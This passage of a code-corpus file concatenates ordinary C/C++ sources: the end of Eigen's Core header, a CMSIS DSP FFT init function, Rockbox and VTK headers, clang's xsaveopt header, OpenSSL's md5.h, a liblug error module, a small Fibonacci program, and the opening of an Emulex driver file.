Detect sse3/ssse3/sse4: // gcc and icc defines __SSE3__, ... // there is no way to know about this on msvc. You can define EIGEN_VECTORIZE_SSE* if you // want to force the use of those instructions with msvc. #ifdef __SSE3__ #define EIGEN_VECTORIZE_SSE3 #endif #ifdef __SSSE3__ #define EIGEN_VECTORIZE_SSSE3 #endif #ifdef __SSE4_1__ #define EIGEN_VECTORIZE_SSE4_1 #endif #ifdef __SSE4_2__ #define EIGEN_VECTORIZE_SSE4_2 #endif #ifdef __AVX__ #define EIGEN_VECTORIZE_AVX #define EIGEN_VECTORIZE_SSE3 #define EIGEN_VECTORIZE_SSSE3 #define EIGEN_VECTORIZE_SSE4_1 #define EIGEN_VECTORIZE_SSE4_2 #endif #ifdef __AVX2__ #define EIGEN_VECTORIZE_AVX2 #endif #ifdef __FMA__ #define EIGEN_VECTORIZE_FMA #endif #if defined(__AVX512F__) && defined(EIGEN_ENABLE_AVX512) #define EIGEN_VECTORIZE_AVX512 #define EIGEN_VECTORIZE_AVX2 #define EIGEN_VECTORIZE_AVX #define EIGEN_VECTORIZE_FMA #ifdef __AVX512DQ__ #define EIGEN_VECTORIZE_AVX512DQ #endif #endif // include files // This extern "C" works around a MINGW-w64 compilation issue // https://sourceforge.net/tracker/index.php?func=detail&aid=3018394&group_id=202880&atid=983354 // In essence, intrin.h is included by windows.h and also declares intrinsics (just as emmintrin.h etc. below do). // However, intrin.h uses an extern "C" declaration, and g++ thus complains of duplicate declarations // with conflicting linkage. The linkage for intrinsics doesn't matter, but at that stage the compiler doesn't know; // so, to avoid compile errors when windows.h is included after Eigen/Core, ensure intrinsics are extern "C" here too. // notice that since these are C headers, the extern "C" is theoretically needed anyways. extern "C" { // In theory we should only include immintrin.h and not the other *mmintrin.h header files directly. // Doing so triggers some issues with ICC. However old gcc versions seems to not have this file, thus: #if EIGEN_COMP_ICC >= 1110 #include <immintrin.h> #else #include <mmintrin.h> #include <emmintrin.h> #include <xmmintrin.h> #ifdef EIGEN_VECTORIZE_SSE3 #include <pmmintrin.h> #endif #ifdef EIGEN_VECTORIZE_SSSE3 #include <tmmintrin.h> #endif #ifdef EIGEN_VECTORIZE_SSE4_1 #include <smmintrin.h> #endif #ifdef EIGEN_VECTORIZE_SSE4_2 #include <nmmintrin.h> #endif #if defined(EIGEN_VECTORIZE_AVX) || defined(EIGEN_VECTORIZE_AVX512) #include <immintrin.h> #endif #endif } // end extern "C" #elif defined __VSX__ #define EIGEN_VECTORIZE #define EIGEN_VECTORIZE_VSX #include <altivec.h> // We need to #undef all these ugly tokens defined in <altivec.h> // => use __vector instead of vector #undef bool #undef vector #undef pixel #elif defined __ALTIVEC__ #define EIGEN_VECTORIZE #define EIGEN_VECTORIZE_ALTIVEC #include <altivec.h> // We need to #undef all these ugly tokens defined in <altivec.h> // => use __vector instead of vector #undef bool #undef vector #undef pixel #elif (defined __ARM_NEON) || (defined __ARM_NEON__) #define EIGEN_VECTORIZE #define EIGEN_VECTORIZE_NEON #include <arm_neon.h> #elif (defined __s390x__ && defined __VEC__) #define EIGEN_VECTORIZE #define EIGEN_VECTORIZE_ZVECTOR #include <vecintrin.h> #endif #endif #if defined(__F16C__) && !defined(EIGEN_COMP_CLANG) // We can use the optimized fp16 to float and float to fp16 conversion routines #define EIGEN_HAS_FP16_C #endif #if defined __CUDACC__ #define EIGEN_VECTORIZE_CUDA #include <vector_types.h> #if defined __CUDACC_VER__ && __CUDACC_VER__ >= 70500 #define EIGEN_HAS_CUDA_FP16 #endif #endif #if defined EIGEN_HAS_CUDA_FP16 #include <host_defines.h> #include <cuda_fp16.h> #endif #if (defined _OPENMP) && (!defined EIGEN_DONT_PARALLELIZE) #define EIGEN_HAS_OPENMP #endif #ifdef EIGEN_HAS_OPENMP #include <omp.h> #endif // MSVC for windows mobile does not have the errno.h file #if !(EIGEN_COMP_MSVC && EIGEN_OS_WINCE) && !EIGEN_COMP_ARM #define EIGEN_HAS_ERRNO #endif #ifdef EIGEN_HAS_ERRNO #include <cerrno> #endif #include <cstddef> #include <cstdlib> #include <cmath> #include <cassert> #include <functional> #include <iosfwd> #include <cstring> #include <string> #include <limits> #include <climits> // for CHAR_BIT // for min/max: #include <algorithm> // for std::is_nothrow_move_assignable #ifdef EIGEN_INCLUDE_TYPE_TRAITS #include <type_traits> #endif // for outputting debug info #ifdef EIGEN_DEBUG_ASSIGN #include <iostream> #endif // required for __cpuid, needs to be included after cmath #if EIGEN_COMP_MSVC && EIGEN_ARCH_i386_OR_x86_64 && !EIGEN_OS_WINCE #include <intrin.h> #endif /** \brief Namespace containing all symbols from the %Eigen library. */ namespace Eigen { inline static const char *SimdInstructionSetsInUse(void) { #if defined(EIGEN_VECTORIZE_AVX512) return "AVX512, FMA, AVX2, AVX, SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2"; #elif defined(EIGEN_VECTORIZE_AVX) return "AVX SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2"; #elif defined(EIGEN_VECTORIZE_SSE4_2) return "SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2"; #elif defined(EIGEN_VECTORIZE_SSE4_1) return "SSE, SSE2, SSE3, SSSE3, SSE4.1"; #elif defined(EIGEN_VECTORIZE_SSSE3) return "SSE, SSE2, SSE3, SSSE3"; #elif defined(EIGEN_VECTORIZE_SSE3) return "SSE, SSE2, SSE3"; #elif defined(EIGEN_VECTORIZE_SSE2) return "SSE, SSE2"; #elif defined(EIGEN_VECTORIZE_ALTIVEC) return "AltiVec"; #elif defined(EIGEN_VECTORIZE_VSX) return "VSX"; #elif defined(EIGEN_VECTORIZE_NEON) return "ARM NEON"; #elif defined(EIGEN_VECTORIZE_ZVECTOR) return "S390X ZVECTOR"; #else return "None"; #endif } } // end namespace Eigen #if defined EIGEN2_SUPPORT_STAGE40_FULL_EIGEN3_STRICTNESS || defined EIGEN2_SUPPORT_STAGE30_FULL_EIGEN3_API || defined EIGEN2_SUPPORT_STAGE20_RESOLVE_API_CONFLICTS || defined EIGEN2_SUPPORT_STAGE10_FULL_EIGEN2_API || defined EIGEN2_SUPPORT // This will generate an error message: #error Eigen2-support is only available up to version 3.2. Please go to "http://eigen.tuxfamily.org/index.php?title=Eigen2" for further information #endif namespace Eigen { // we use size_t frequently and we'll never remember to prepend it with std:: everytime just to // ensure QNX/QCC support using std::size_t; // gcc 4.6.0 wants std:: for ptrdiff_t using std::ptrdiff_t; } /** \defgroup Core_Module Core module * This is the main module of Eigen providing dense matrix and vector support * (both fixed and dynamic size) with all the features corresponding to a BLAS library * and much more... * * \code * #include <Eigen/Core> * \endcode */ #include "src/Core/util/Constants.h" #include "src/Core/util/Meta.h" #include "src/Core/util/ForwardDeclarations.h" #include "src/Core/util/StaticAssert.h" #include "src/Core/util/XprHelper.h" #include "src/Core/util/Memory.h" #include "src/Core/NumTraits.h" #include "src/Core/MathFunctions.h" #include "src/Core/GenericPacketMath.h" #include "src/Core/MathFunctionsImpl.h" #if defined EIGEN_VECTORIZE_AVX512 #include "src/Core/arch/SSE/PacketMath.h" #include "src/Core/arch/AVX/PacketMath.h" #include "src/Core/arch/AVX512/PacketMath.h" #include "src/Core/arch/AVX512/MathFunctions.h" #elif defined EIGEN_VECTORIZE_AVX // Use AVX for floats and doubles, SSE for integers #include "src/Core/arch/SSE/PacketMath.h" #include "src/Core/arch/SSE/Complex.h" #include "src/Core/arch/SSE/MathFunctions.h" #include "src/Core/arch/AVX/PacketMath.h" #include "src/Core/arch/AVX/MathFunctions.h" #include "src/Core/arch/AVX/Complex.h" #include "src/Core/arch/AVX/TypeCasting.h" #elif defined EIGEN_VECTORIZE_SSE #include "src/Core/arch/SSE/PacketMath.h" #include "src/Core/arch/SSE/MathFunctions.h" #include "src/Core/arch/SSE/Complex.h" #include "src/Core/arch/SSE/TypeCasting.h" #elif defined(EIGEN_VECTORIZE_ALTIVEC) || defined(EIGEN_VECTORIZE_VSX) #include "src/Core/arch/AltiVec/PacketMath.h" #include "src/Core/arch/AltiVec/MathFunctions.h" #include "src/Core/arch/AltiVec/Complex.h" #elif defined EIGEN_VECTORIZE_NEON #include "src/Core/arch/NEON/PacketMath.h" #include "src/Core/arch/NEON/MathFunctions.h" #include "src/Core/arch/NEON/Complex.h" #elif defined EIGEN_VECTORIZE_ZVECTOR #include "src/Core/arch/ZVector/PacketMath.h" #include "src/Core/arch/ZVector/MathFunctions.h" #include "src/Core/arch/ZVector/Complex.h" #endif // Half float support #include "src/Core/arch/CUDA/Half.h" #include "src/Core/arch/CUDA/PacketMathHalf.h" #include "src/Core/arch/CUDA/TypeCasting.h" #if defined EIGEN_VECTORIZE_CUDA #include "src/Core/arch/CUDA/PacketMath.h" #include "src/Core/arch/CUDA/MathFunctions.h" #endif #include "src/Core/arch/Default/Settings.h" #include "src/Core/functors/TernaryFunctors.h" #include "src/Core/functors/BinaryFunctors.h" #include "src/Core/functors/UnaryFunctors.h" #include "src/Core/functors/NullaryFunctors.h" #include "src/Core/functors/StlFunctors.h" #include "src/Core/functors/AssignmentFunctors.h" // Specialized functors to enable the processing of complex numbers // on CUDA devices #include "src/Core/arch/CUDA/Complex.h" #include "src/Core/IO.h" #include "src/Core/DenseCoeffsBase.h" #include "src/Core/DenseBase.h" #include "src/Core/MatrixBase.h" #include "src/Core/EigenBase.h" #include "src/Core/Product.h" #include "src/Core/CoreEvaluators.h" #include "src/Core/AssignEvaluator.h" #ifndef EIGEN_PARSED_BY_DOXYGEN // work around Doxygen bug triggered by Assign.h r814874 // at least confirmed with Doxygen 1.5.5 and 1.5.6 #include "src/Core/Assign.h" #endif #include "src/Core/ArrayBase.h" #include "src/Core/util/BlasUtil.h" #include "src/Core/DenseStorage.h" #include "src/Core/NestByValue.h" // #include "src/Core/ForceAlignedAccess.h" #include "src/Core/ReturnByValue.h" #include "src/Core/NoAlias.h" #include "src/Core/PlainObjectBase.h" #include "src/Core/Matrix.h" #include "src/Core/Array.h" #include "src/Core/CwiseTernaryOp.h" #include "src/Core/CwiseBinaryOp.h" #include "src/Core/CwiseUnaryOp.h" #include "src/Core/CwiseNullaryOp.h" #include "src/Core/CwiseUnaryView.h" #include "src/Core/SelfCwiseBinaryOp.h" #include "src/Core/Dot.h" #include "src/Core/StableNorm.h" #include "src/Core/Stride.h" #include "src/Core/MapBase.h" #include "src/Core/Map.h" #include "src/Core/Ref.h" #include "src/Core/Block.h" #include "src/Core/VectorBlock.h" #include "src/Core/Transpose.h" #include "src/Core/DiagonalMatrix.h" #include "src/Core/Diagonal.h" #include "src/Core/DiagonalProduct.h" #include "src/Core/Redux.h" #include "src/Core/Visitor.h" #include "src/Core/Fuzzy.h" #include "src/Core/Swap.h" #include "src/Core/CommaInitializer.h" #include "src/Core/GeneralProduct.h" #include "src/Core/Solve.h" #include "src/Core/Inverse.h" #include "src/Core/SolverBase.h" #include "src/Core/PermutationMatrix.h" #include "src/Core/Transpositions.h" #include "src/Core/TriangularMatrix.h" #include "src/Core/SelfAdjointView.h" #include "src/Core/products/GeneralBlockPanelKernel.h" #include "src/Core/products/Parallelizer.h" #include "src/Core/ProductEvaluators.h" #include "src/Core/products/GeneralMatrixVector.h" #include "src/Core/products/GeneralMatrixMatrix.h" #include "src/Core/SolveTriangular.h" #include "src/Core/products/GeneralMatrixMatrixTriangular.h" #include "src/Core/products/SelfadjointMatrixVector.h" #include "src/Core/products/SelfadjointMatrixMatrix.h" #include "src/Core/products/SelfadjointProduct.h" #include "src/Core/products/SelfadjointRank2Update.h" #include "src/Core/products/TriangularMatrixVector.h" #include "src/Core/products/TriangularMatrixMatrix.h" #include "src/Core/products/TriangularSolverMatrix.h" #include "src/Core/products/TriangularSolverVector.h" #include "src/Core/BandMatrix.h" #include "src/Core/CoreIterators.h" #include "src/Core/ConditionEstimator.h" #include "src/Core/BooleanRedux.h" #include "src/Core/Select.h" #include "src/Core/VectorwiseOp.h" #include "src/Core/Random.h" #include "src/Core/Replicate.h" #include "src/Core/Reverse.h" #include "src/Core/ArrayWrapper.h" #ifdef EIGEN_USE_BLAS #include "src/Core/products/GeneralMatrixMatrix_BLAS.h" #include "src/Core/products/GeneralMatrixVector_BLAS.h" #include "src/Core/products/GeneralMatrixMatrixTriangular_BLAS.h" #include "src/Core/products/SelfadjointMatrixMatrix_BLAS.h" #include "src/Core/products/SelfadjointMatrixVector_BLAS.h" #include "src/Core/products/TriangularMatrixMatrix_BLAS.h" #include "src/Core/products/TriangularMatrixVector_BLAS.h" #include "src/Core/products/TriangularSolverMatrix_BLAS.h" #endif // EIGEN_USE_BLAS #ifdef EIGEN_USE_MKL_VML #include "src/Core/Assign_MKL.h" #endif #include "src/Core/GlobalFunctions.h" #include "src/Core/util/ReenableStupidWarnings.h" #endif // EIGEN_CORE_H
{ "language": "C" }
/* ---------------------------------------------------------------------- * Copyright (C) 2010-2014 ARM Limited. All rights reserved. * * $Date: 19. March 2015 * $Revision: V.1.4.5 * * Project: CMSIS DSP Library * Title: arm_cfft_radix4_init_q15.c * * Description: Radix-4 Decimation in Frequency Q15 FFT & IFFT initialization function * * Target Processor: Cortex-M4/Cortex-M3/Cortex-M0 * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * - Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * - Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * - Neither the name of ARM LIMITED nor the names of its contributors * may be used to endorse or promote products derived from this * software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. * -------------------------------------------------------------------- */ #include "arm_math.h" #include "arm_common_tables.h" /** * @ingroup groupTransforms */ /** * @addtogroup ComplexFFT * @{ */ /** * @brief Initialization function for the Q15 CFFT/CIFFT. * @deprecated Do not use this function. It has been superseded by \ref arm_cfft_q15 and will be removed * @param[in,out] *S points to an instance of the Q15 CFFT/CIFFT structure. * @param[in] fftLen length of the FFT. * @param[in] ifftFlag flag that selects forward (ifftFlag=0) or inverse (ifftFlag=1) transform. * @param[in] bitReverseFlag flag that enables (bitReverseFlag=1) or disables (bitReverseFlag=0) bit reversal of output. * @return The function returns ARM_MATH_SUCCESS if initialization is successful or ARM_MATH_ARGUMENT_ERROR if <code>fftLen</code> is not a supported value. * * \par Description: * \par * The parameter <code>ifftFlag</code> controls whether a forward or inverse transform is computed. * Set(=1) ifftFlag for calculation of CIFFT otherwise CFFT is calculated * \par * The parameter <code>bitReverseFlag</code> controls whether output is in normal order or bit reversed order. * Set(=1) bitReverseFlag for output to be in normal order otherwise output is in bit reversed order. * \par * The parameter <code>fftLen</code> Specifies length of CFFT/CIFFT process. Supported FFT Lengths are 16, 64, 256, 1024. * \par * This Function also initializes Twiddle factor table pointer and Bit reversal table pointer. */ arm_status arm_cfft_radix4_init_q15( arm_cfft_radix4_instance_q15 * S, uint16_t fftLen, uint8_t ifftFlag, uint8_t bitReverseFlag) { /* Initialise the default arm status */ arm_status status = ARM_MATH_SUCCESS; /* Initialise the FFT length */ S->fftLen = fftLen; /* Initialise the Twiddle coefficient pointer */ S->pTwiddle = (q15_t *) twiddleCoef_4096_q15; /* Initialise the Flag for selection of CFFT or CIFFT */ S->ifftFlag = ifftFlag; /* Initialise the Flag for calculation Bit reversal or not */ S->bitReverseFlag = bitReverseFlag; /* Initializations of structure parameters depending on the FFT length */ switch (S->fftLen) { case 4096u: /* Initializations of structure parameters for 4096 point FFT */ /* Initialise the twiddle coef modifier value */ S->twidCoefModifier = 1u; /* Initialise the bit reversal table modifier */ S->bitRevFactor = 1u; /* Initialise the bit reversal table pointer */ S->pBitRevTable = (uint16_t *) armBitRevTable; break; case 1024u: /* Initializations of structure parameters for 1024 point FFT */ S->twidCoefModifier = 4u; S->bitRevFactor = 4u; S->pBitRevTable = (uint16_t *) & armBitRevTable[3]; break; case 256u: /* Initializations of structure parameters for 256 point FFT */ S->twidCoefModifier = 16u; S->bitRevFactor = 16u; S->pBitRevTable = (uint16_t *) & armBitRevTable[15]; break; case 64u: /* Initializations of structure parameters for 64 point FFT */ S->twidCoefModifier = 64u; S->bitRevFactor = 64u; S->pBitRevTable = (uint16_t *) & armBitRevTable[63]; break; case 16u: /* Initializations of structure parameters for 16 point FFT */ S->twidCoefModifier = 256u; S->bitRevFactor = 256u; S->pBitRevTable = (uint16_t *) & armBitRevTable[255]; break; default: /* Reporting argument error if fftSize is not valid value */ status = ARM_MATH_ARGUMENT_ERROR; break; } return (status); } /** * @} end of ComplexFFT group */
{ "language": "C" }
/*************************************************************************** * __________ __ ___. * Open \______ \ ____ ____ | | _\_ |__ _______ ___ * Source | _// _ \_/ ___\| |/ /| __ \ / _ \ \/ / * Jukebox | | ( <_> ) \___| < | \_\ ( <_> > < < * Firmware |____|_ /\____/ \___ >__|_ \|___ /\____/__/\_ \ * \/ \/ \/ \/ \/ * * Copyright (C) 2013 Lorenzo Miori * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY * KIND, either express or implied. * ****************************************************************************/ #ifndef __DEV_IOCTL_YPR0_H__ #define __DEV_IOCTL_YPR0_H__ #include <sys/ioctl.h> #include "stdint.h" /** * This is the wrapper to r1Bat.ko module with the possible * ioctl calls, retrieved by RE * The "Fuel gauge" - battery controller - is the MAX17040GT */ /* A typical read spans 2 registers */ typedef struct { uint8_t addr; uint8_t reg1; uint8_t reg2; }__attribute__((packed)) max17040_request; /* Registers are 16-bit wide */ #define MAX17040_GET_BATTERY_VOLTAGE 0x80045800 #define MAX17040_GET_BATTERY_CAPACITY 0x80045801 #define MAX17040_READ_REG 0x80035803 #define MAX17040_WRITE_REG 0x40035802 void max17040_init(void); void max17040_close(void); int max17040_ioctl(int request, int *data); #endif /* __DEV_IOCTL_YPR0_H__ */
{ "language": "C" }
#include <bits/stdc++.h> using namespace std; int main() { unsigned long long dp[100] = {0, 1, 1, 2, 3}; for (int i = 2; i < 100; i++) dp[i] = dp[i-1] + dp[i-2]; int n; while (scanf("%d", &n) == 1 && n) printf("%llu\n", dp[n]); return 0; }
{ "language": "C" }
/*===---- xsaveoptintrin.h - XSAVEOPT intrinsic ----------------------------=== * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * *===-----------------------------------------------------------------------=== */ #ifndef __IMMINTRIN_H #error "Never use <xsaveoptintrin.h> directly; include <immintrin.h> instead." #endif #ifndef __XSAVEOPTINTRIN_H #define __XSAVEOPTINTRIN_H /* Define the default attributes for the functions in this file. */ #define __DEFAULT_FN_ATTRS __attribute__((__always_inline__, __nodebug__, __target__("xsaveopt"))) static __inline__ void __DEFAULT_FN_ATTRS _xsaveopt(void *__p, unsigned long long __m) { __builtin_ia32_xsaveopt(__p, __m); } #ifdef __x86_64__ static __inline__ void __DEFAULT_FN_ATTRS _xsaveopt64(void *__p, unsigned long long __m) { __builtin_ia32_xsaveopt64(__p, __m); } #endif #undef __DEFAULT_FN_ATTRS #endif
{ "language": "C" }
/* crypto/md5/md5.h */ /* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com) * All rights reserved. * * This package is an SSL implementation written * by Eric Young (eay@cryptsoft.com). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial and non-commercial use as long as * the following conditions are aheared to. The following conditions * apply to all code found in this distribution, be it the RC4, RSA, * lhash, DES, etc., code; not just the SSL code. The SSL documentation * included with this distribution is covered by the same copyright terms * except that the holder is Tim Hudson (tjh@cryptsoft.com). * * Copyright remains Eric Young's, and as such any Copyright notices in * the code are not to be removed. * If this package is used in a product, Eric Young should be given attribution * as the author of the parts of the library used. * This can be in the form of a textual message at program startup or * in documentation (online or textual) provided with the package. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * "This product includes cryptographic software written by * Eric Young (eay@cryptsoft.com)" * The word 'cryptographic' can be left out if the rouines from the library * being used are not cryptographic related :-). * 4. If you include any Windows specific code (or a derivative thereof) from * the apps directory (application code) you must include an acknowledgement: * "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" * * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * The licence and distribution terms for any publically available version or * derivative of this code cannot be changed. i.e. this code cannot simply be * copied and put under another distribution licence * [including the GNU Public Licence.] */ #ifndef HEADER_MD5_H # define HEADER_MD5_H # include <openssl/e_os2.h> # include <stddef.h> #ifdef __cplusplus extern "C" { #endif # ifdef OPENSSL_NO_MD5 # error MD5 is disabled. # endif /* * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! * ! MD5_LONG has to be at least 32 bits wide. If it's wider, then ! * ! MD5_LONG_LOG2 has to be defined along. ! * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! */ # if defined(__LP32__) # define MD5_LONG unsigned long # elif defined(OPENSSL_SYS_CRAY) || defined(__ILP64__) # define MD5_LONG unsigned long # define MD5_LONG_LOG2 3 /* * _CRAY note. I could declare short, but I have no idea what impact * does it have on performance on none-T3E machines. I could declare * int, but at least on C90 sizeof(int) can be chosen at compile time. * So I've chosen long... * <appro@fy.chalmers.se> */ # else # define MD5_LONG unsigned int # endif # define MD5_CBLOCK 64 # define MD5_LBLOCK (MD5_CBLOCK/4) # define MD5_DIGEST_LENGTH 16 typedef struct MD5state_st { MD5_LONG A, B, C, D; MD5_LONG Nl, Nh; MD5_LONG data[MD5_LBLOCK]; unsigned int num; } MD5_CTX; # ifdef OPENSSL_FIPS int private_MD5_Init(MD5_CTX *c); # endif int MD5_Init(MD5_CTX *c); int MD5_Update(MD5_CTX *c, const void *data, size_t len); int MD5_Final(unsigned char *md, MD5_CTX *c); unsigned char *MD5(const unsigned char *d, size_t n, unsigned char *md); void MD5_Transform(MD5_CTX *c, const unsigned char *b); #ifdef __cplusplus } #endif #endif
{ "language": "C" }
/* * This software is copyrighted as noted below. It may be freely copied, * modified, and redistributed, provided that the copyright notice is * preserved on all copies. * * There is no warranty or other guarantee of fitness for this software, * it is provided solely "as is". Bug reports or fixes may be sent * to the author, who may or may not act on them as he desires. * * You may not include this software in a program or other software product * without supplying the source, or without informing the end-user that the * source is available for no extra charge. * * If you modify this software, you should include a notice giving the * name of the person performing the modification, the date of modification, * and the reason for such modification. */ /* * error.c - error function. * * Author: Raul Rivero * Mathematics Dept. * University of Oviedo * Date: Sat Jan 4 1992 * Copyright (c) 1992, Raul Rivero * */ #include "lug.h" char *MY_NAME = "liblug"; int lugerrno = 0; int stop_on_error = 1; char *lug_errlist[] = { /* 0 */ "Bad format of usage\n", /* 1 */ "Cannot open file\n", /* 2 */ "Out of memory\n", /* 3 */ "Error while reading input file\n", /* 4 */ "Error while writing output file\n", /* 5 */ "Unkown input file type\n", /* 6 */ "File corrupt ( uncompress too bytes )\n", /* 7 */ "File is not a RGB image or gray scaled\n", /* 8 */ "Uncompress failed or compressed file don't exist\n", /* 9 */ "Unkown encoding type\n", /* 10 */ "Incorrect number of planes\n", /* 11 */ "Incorrect number of levels for dither\n", /* 12 */ "Incorrect size of images\n", /* 13 */ "Mapped image without color map ( ?! )\n", /* 14 */ "Incorrect image bits ( only 16, 24 or 32 )\n", /* 15 */ "File is not a mapped image\n", /* 16 */ "Cannot open graphics display\n", /* 17 */ "Interlazed image\n", /* 18 */ "File contains an uncomplete image\n", /* 19 */ "Using an image with MAGIC unset\n", /* 20 */ "Standard input not avaible with this format\n", /* 21 */ "Cannot get a Tag from the TIFF file\n", /* 22 */ "Incorrect resampling values\n", /* 23 */ "Image is not RGB/Gray scaled image\n", NULL }; char *lugerrmsg(int code) { return lug_errlist[ code ]; } void Error(int code) { int static last = 0; lugerrno = code; if ( !last ) { /* * Search, the first time, the last * error message. */ for ( ; lug_errlist[last]; last++); } if ( stop_on_error ) { /* * Write the error message and * stop the program. */ fprintf(stderr, "%s: ", MY_NAME); switch ( code ) { case 99: fprintf(stderr, "Not ready\n"); break; default: if ( code >= 0 && code <= last ) { fputs( lug_errlist[code], stderr ); }else { fprintf( stderr, "Unknown error code (%d)\n", code); } break; } exit( 1 ); } }
{ "language": "C" }
/*========================================================================= Program: Visualization Toolkit Module: vtkStructuredPoints.h Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen All rights reserved. See Copyright.txt or http://www.kitware.com/Copyright.htm for details. This software is distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the above copyright notice for more information. =========================================================================*/ /** * @class vtkStructuredPoints * @brief A subclass of ImageData. * * StructuredPoints is a subclass of ImageData that requires the data extent * to exactly match the update extent. Normall image data allows that the * data extent may be larger than the update extent. * StructuredPoints also defines the origin differently that vtkImageData. * For structured points the origin is the location of first point. * Whereas images define the origin as the location of point 0, 0, 0. * Image Origin is stored in ivar, and structured points * have special methods for setting/getting the origin/extents. */ #ifndef vtkStructuredPoints_h #define vtkStructuredPoints_h #include "vtkCommonDataModelModule.h" // For export macro #include "vtkImageData.h" class VTKCOMMONDATAMODEL_EXPORT vtkStructuredPoints : public vtkImageData { public: static vtkStructuredPoints* New(); vtkTypeMacro(vtkStructuredPoints, vtkImageData); /** * To simplify filter superclasses, */ int GetDataObjectType() override { return VTK_STRUCTURED_POINTS; } protected: vtkStructuredPoints(); ~vtkStructuredPoints() override = default; private: vtkStructuredPoints(const vtkStructuredPoints&) = delete; void operator=(const vtkStructuredPoints&) = delete; }; #endif // VTK-HeaderTest-Exclude: vtkStructuredPoints.h
{ "language": "C" }
/* * Copyright (C) 2005 - 2011 Emulex * All rights reserved. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License version 2 * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * * Contact Information: * linux-drivers@emulex.com * * Emulex * 3333 Susan Street * Costa Mesa, CA 92626 */ #include "be.h" #include "be_cmds.h" /* Must be a power of 2 or else MODULO will BUG_ON */ static int be_get_temp_freq = 64; static inline void *embedded_payload(struct be_mcc_wrb *wrb) { return wrb->payload.embedded_payload; } static void be_mcc_notify(struct be_adapter *adapter) { struct be_queue_info *mccq = &adapter->mcc_obj.q; u32 val = 0; if (be_error(adapter)) return; val |= mccq->id & DB_MCCQ_RING_ID_MASK; val |= 1 << DB_MCCQ_NUM_POSTED_SHIFT; wmb(); iowrite32(val, adapter->db + DB_MCCQ_OFFSET); } /* To check if valid bit is set, check the entire word as we don't know * the endianness of the data (old entry is host endian while a new entry is * little endian) */ static 